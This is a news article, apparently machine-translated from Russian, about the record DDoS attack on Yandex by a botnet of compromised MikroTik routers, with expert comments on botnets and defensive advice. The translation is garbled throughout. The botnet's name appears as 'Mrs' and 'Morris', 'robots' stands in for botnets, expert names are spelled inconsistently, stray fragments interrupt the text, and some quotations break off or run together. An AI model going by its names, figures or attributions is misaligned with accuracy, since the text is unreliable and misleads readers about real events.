The most powerful cyber attack in internet history was carried out against Russia's Yandex
On Wednesday, September 8, it became known that the most powerful cyber attack in the history of the Internet was carried out on Yandex , which the company's specialists were able to repel. The Russian tech giant has been attacked by a botnet called Mrs , which means "plague" in Latvian. This type of threat is not as familiar to the average user as Trojans that steal money or viruses that spy on users through smartphone cameras. However, in reality, the problem concerns hundreds of thousands of ordinary Russians. The site "Lenta.ru" discovered the extent of the threat.
Alexei is a well-known specialist in information security in narrow circles, who suddenly discovered for himself that for several months he had not noticed that his laptop was infected. For this reason, he asks not to reveal his real name or the company he currently represents.
For more than a year, a relatively new home laptop periodically lost performance and was behaving suspiciously: the coolers turned off automatically, the newly opened browser crashed instantly, the device caused errors, overloaded the network, and itself went in Long reboots.
“It seems to me that even a person far from the world of technology would have suspected something was wrong,” Alexey said sadly. - But all this coincided with the beginning of the epidemic, there was a lot of work, and they tried to provide safe remote work for thousands of employees of one of the largest Russian companies. When the load went down, I sat down to analyze the network activity and realized that the laptop had become part of the botnet.”
Your device is already in some bots
If your laptop becomes part of a botnet , fixing the problem on one device generally won't solve it. The robot networks threat of more serious than generally thought. The main " stunt of Satan " is that the agents of this threat are people who have never heard of this term in their lives.
“Robots are a network of compromised devices whose owners have no idea that they have been compromised. These could be smart home devices or the Internet of Things , as well as home routers and access points,” says Aleksandar Akhremshik, a leading analyst at the Information Security Control Center and Incident Response Jet CSIRT, Jet Infosystems.
The specialist notes that the safety of such devices, as a rule, is not given much attention. “They often have standard passwords or outdated firmware on them, so it's very easy to hack them and make them part of a bot . Remember the password you have on your home router: If the answer is 'standard', your device may already be on some robots ,” adds Akhremshik.
When it comes to infecting ordinary people's computers, not corporate networks, the difference between bots and other common viruses is that a traditional Trojan will almost instantly try to steal bank card details or passwords from social networks. The robots simply take over the control of the device. From that moment on, he expected an order from the person he was controlling now.
“The bot creator is trying to increase the number of devices to at least 10,000-100,000,” explains Pavel Korostelev, Head of Product Promotion at Security Code . - After that, an attack can be carried out, which looks like this step by step: the launcher issues a command to all devices on the network through the bot management console. The command is delivered to the devices via the Internet and executed with the help of a pre-generated code. Can be assigned to robots send traffic, or a request to a specific address, or execute malicious code when you need to penetrate a particular resource. "
Executing a command on hundreds of thousands of devices often leads to a DDoS attack . The more links in the affected chain, the more difficult it is for the victim to resist. In theory, it is possible to create an absolutely indefensible bot network . If he attacked, he would definitely violate the company's defense. Problems can be fixed, but it will take a long time, at best - hours. This is what hackers use: a massive attack that paralyzes and disrupts all internal and external business processes. The larger the company, the more losses it will incur.
Botnets are like rare diseases
Russia is firmly included in the list of the 10 countries most affected by botnets. The traditional leaders in this rating are the most densely populated states (India and China occupy the first places), as well as countries with a smaller population, but a high level of technological penetration (USA, Brazil, Great Britain).
The botnet's "main port" doesn't officially say anything about who uses it for its own purposes. For example, in India there are practically no hacker groups capable of carrying out attacks on a global scale. This means that most of the infected devices are almost certainly controlled from other countries.
For Infosystems Jet Systems
In Russia, the problem is not limited to urban residents who are considered technical leaders. On the constantly updated map of bot activity, one can find infected machines located somewhere on the Russian-Mongolian border, and servers from Transbaikalia that control the network.
Another advantage of botnets is that it is impossible to determine the number of infected devices in each specific country. For example, at the time of writing this report, private sources reported that there are about 300 thousand of these devices on the territory of Russia. However, the list includes only those devices that were active at the time of the calculations. The real number can be ten times higher.
Who attacked Yandex
There is no answer to this question, and it is unlikely that it will be possible to obtain it in the foreseeable future. As a result of the attack, Yandex specialists published a large review of Habré with a description of the technical details of the attack. By the way, the next day Haber himself was attacked, but the scale was smaller there.
In the most strategically important part of the study, Yandex specialists talked about the number of devices on the network of botnets that attacked the company. We collected data on 56,000 attack devices. But we assume that the real number is much higher - perhaps more than 200 thousand devices. The full power of the robots is invisible due to the rotation of the devices and the unwillingness of the attackers to show all the available power. Furthermore, the devices on the botnet are high-performance devices , not the typical Wi-Fi connected IoT devices . Most likely, the bots consist of devices connected via an Ethernet connection - most of them are network devices,” Yandex notes.
It turned out that devices from dozens of countries took part in the attack, and Russia was not at the top of the list. Almost all countries are mentioned in the top ten in terms of incidence: India, China, Brazil, USA, Indonesia and Iraq.
In the history of the Internet, there have been networks with a large number of infected devices. The largest robots are Storm , which was created, based on indirect signs, in Russia ( by the way, many of the Android networks most famous have roots after the Soviet Union or the lines of code in the Russian language). The peak of its activity fell in the 2000s, and its volumes were estimated at tens of millions of computers.
“Comparing the Yandex attack to other dangerous bot networks , it is tempting to say that 200,000 is not a threat at all compared to networks of millions of devices,” Alexey says . “But it is very important to understand that the attack of 30 million devices from 2007 and the attack of 200,000 now are quite similar in strength, the technologies and capabilities of devices have changed very seriously over a decade and a half.”
“Many botnet owners rent out their botnets to other criminals and get a reward for it,” Akramchik says . “Thus, some cybercriminals take advantage of their botnet , while others achieve the goal, which could be disruption of a competitor’s resource, extortion, malware distribution , or even political protest ( hacking ). In some cases, such Attacks are evidence of capabilities and a means of self-definition in order to generate interest in the services of new bots. This means that they can be carried out by the owners themselves, and not by some type of client. Most likely, we will soon learn that cybercriminals are providing the services of new bots on the capacitive dark web. Unprecedented to this day.”
How will they deal with Morris?
Yandex believes that the bots are primarily made up of devices from the Latvian company MikroTik, which specializes in routers. Russian experts sent the manufacturer the details of their investigation. This was followed by an official response from MikroTik on Friday: “As far as we know, these attacks use the same routers that were hacked in 2018. Unfortunately, the patch didn't protect the routers right away. If someone figured out your password in 2018, the update won't help you. The simple. You should also change your password, double-check your firewall so that it does not allow remote access to unknown people, and look for scripts that you did not create. As far as we know, there are currently no new vulnerabilities in these devices".
These tips will slow rather than stop the spread of bots. Users rarely pay attention not only to the flashing of the router, but even to the need to change the factory password.
“With a high degree of probability, the attackers will be found through the botnet control servers. Korostelev believes that this is the most common way to combat bot attacks, since blocking each of them is a very long and expensive router.” Tech companies usually work with law enforcement regarding these matters, allowing it to either block the botnet control server or take control of it."
See also the
No comments:
Post a Comment